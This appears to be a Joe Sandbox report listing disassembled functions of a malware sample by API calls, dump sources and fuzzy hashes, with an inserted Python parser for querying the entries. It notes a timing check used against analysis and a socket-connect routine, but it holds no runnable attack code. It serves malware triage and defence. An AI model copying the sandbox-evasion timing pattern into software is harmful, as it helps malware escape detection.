• Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
• Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
• Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
• Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
• Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
• Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
• Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
APIs
• IsWindowVisible.USER32(?), ref: 00445879
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• _wcslen.LIBCMT ref: 004458FB
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
• String ID:
• API String ID: 3087257052-0
• Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
• Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
• Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
• Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 245547762-0
                                                                                                                                                                                                                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                                                                                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
APIs
• DeleteObject.GDI32(00000000), ref: 004471D8
• ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
• SelectObject.GDI32(?,00000000), ref: 00447228
• BeginPath.GDI32(?), ref: 0044723D
• SelectObject.GDI32(?,00000000), ref: 00447266
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• String ID:
• API String ID: 2338827641-0
• Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
• Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
• Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
• Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
• Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
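The function listing above is long and uniform: each entry is an "APIs" block of call sites, a "Memory Dump Source" block and a "Similarity" block with the API String ID and fuzzy hashes. When triaging a report like this one it is usually faster to pull those entries into structured records and query them (for example, find the routine that pairs Sleep with QueryPerformanceCounter, which is the execution-timing check flagged in the signature list, or the routine that opens and closes a WSOCK32 connection) than to scroll through them. The parser below is an added example, not Joe Sandbox tooling and not code from the sample; the only format assumptions it makes (the "•" bullet, the `Name.MODULE(args), ref: ADDR` call layout and the `Part of subcall function` prefix) are taken from the entries shown on this page, and the embedded input is constructed by copying the WSOCK32 and timing entries above with their indentation removed.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Iterable, Optional

# Constructed input: the WSOCK32 connect routine and the Sleep/QueryPerformanceCounter
# routine copied from the function listing above, leading whitespace stripped.
# Only the fields the parser reads are kept; the "Associated:" lines are omitted.
SAMPLE_ENTRIES = """\
APIs
• Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
• Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
"""

# One call-site line: optional subcall prefix, Name.MODULE(args), ref: hex address.
API_CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<subaddr>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
# Any other "• Key: value" bullet (API ID, API String ID, fuzzy hashes, ...).
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]          # raw argument cells; "?" means the analyzer could not resolve it
    ref: int                 # call-site address inside the dumped image
    via_subcall: Optional[int] = None   # address of the sub-function that makes the call


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    @property
    def api_names(self) -> set[str]:
        return {c.name for c in self.calls}

    @property
    def first_ref(self) -> Optional[int]:
        # Lowest call-site address; a cheap stand-in for "where in .text this routine lives".
        return min((c.ref for c in self.calls), default=None)


def parse_entries(text: str) -> list[FunctionEntry]:
    """Split a Joe Sandbox function listing into one FunctionEntry per 'APIs' block."""
    entries: list[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue               # section headers such as "Similarity" carry no data
        m = API_CALL_RE.match(line)
        if m:
            current.calls.append(ApiCall(
                name=m["name"], module=m["module"],
                args=[a for a in m["args"].split(",") if a],
                ref=int(m["ref"], 16),
                via_subcall=int(m["subaddr"], 16) if m["subaddr"] else None,
            ))
            continue
        f = FIELD_RE.match(line)
        if f:
            current.fields[f["key"].strip()] = f["value"].strip()
    return entries


def entries_using(entries: Iterable[FunctionEntry], required: Iterable[str]) -> list[FunctionEntry]:
    """Return the entries whose API set contains every name in `required`."""
    wanted = set(required)
    return [e for e in entries if wanted <= e.api_names]


def summarize(entry: FunctionEntry) -> tuple[str, str, list[str]]:
    """(first call-site address, API String ID, sorted API names) for quick tabulation."""
    ref = entry.first_ref
    return (f"{ref:08X}" if ref is not None else "?", entry.fields.get("API String ID", ""),
            sorted(entry.api_names))


if __name__ == "__main__":
    for e in parse_entries(SAMPLE_ENTRIES):
        print(summarize(e))
```

`entries_using(entries, ["Sleep", "QueryPerformanceCounter"])` isolates the timing routine, and the same filter with `["socket", "connect", "closesocket"]` isolates the connect routine; the `API String ID` and `Instruction Fuzzy Hash` fields it preserves are what you would carry over to compare this sample's functions against other reports.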
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
• Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
APIs
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$Icon
• String ID:
• API String ID: 4023252218-0
• Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
• Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
• Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
• Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1489400265-0
                                                                                                                                                                                                                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                                                                                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1042038666-0
                                                                                                                                                                                                                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                                                                                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __getptd.LIBCMT ref: 0041780F
                                                                                                                                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00417826
                                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                                                                                                                • __lock.LIBCMT ref: 00417844
                                                                                                                                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 938513278-0
                                                                                                                                                                                                                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2403457894-0
                                                                                                                                                                                                                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                                                                                                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00415209
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 4247068974-0
Strings
Similarity
• API ID:
• String ID: )$U$\
• API String ID: 0-3705770531
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 0046E505
